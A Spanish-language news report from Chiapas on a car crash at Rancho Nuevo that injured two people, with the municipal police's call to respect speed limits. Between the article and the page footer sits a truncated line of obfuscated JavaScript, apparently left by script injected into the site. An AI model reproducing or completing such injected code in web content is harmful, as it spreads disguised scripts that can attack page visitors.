Fuerte accidente a la altura de Rancho Nuevo

Óscar Gómez/Corresponsal

29 de Agosto del 2023. San Cristóbal de Las Casas.- Una camioneta Ford, tipo Eco Sport, de color rojo, se impactó la noche de este lunes contra un muro de contención a la altura de Rancho Nuevo, en el tramo carretero entre San Cristóbal de Las Casas y el municipio de Teopisca.

Según un comunicado de la Policía Municipal, nuevamente el exceso de velocidad, aunado a la falta de precaución y el pavimento mojado, dio como resultado un accidente.

“En este hecho de tránsito resultaron policontundidos y con algunas lesiones Ricardo “N N” y su acompañante, María “N N”, los cuales recibieron atención en el lugar por parte de elementos de la Dirección de Policía Municipal, Protección Civil, Heroico Cuerpo de Bomberos y de la Guardia Nacional, y minutos después fueron trasladados a un nosocomio de San Cristóbal de Las Casas, donde se reportan estables”, citan en el escrito.

Finalmente, la Dirección de Policía Municipal exhortó a automovilistas y motociclistas a respetar los límites de velocidad y extremar precauciones en todo momento, “a fin de evitar situaciones que pongan en riesgo la salud e integridad de las personas y sobre todo, las consecuencias legales y económicas que conlleva la falta de precaución”.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *